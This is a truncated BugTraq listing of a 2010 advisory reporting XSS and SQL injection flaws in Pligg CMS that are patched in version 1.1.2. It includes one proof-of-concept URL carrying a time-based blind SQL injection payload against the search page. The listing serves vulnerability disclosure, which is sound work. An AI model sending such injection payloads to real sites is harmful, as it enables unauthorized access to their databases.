BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Pligg XSS and SQL Injection Dec 25 2010 07:03PM
mike sitewat ch
Credit: Michael Brooks
Bug Fix in 1.1.2:
http://www.pligg.com/blog/1174/pligg-cms-1-1-2-release/

Special thanks to Eric Heikkinen for patching these quickly.

Blind SQL Injection
http://host/pligg_1.1.2/search.php?adv=1&status=
'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
+&sgr...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus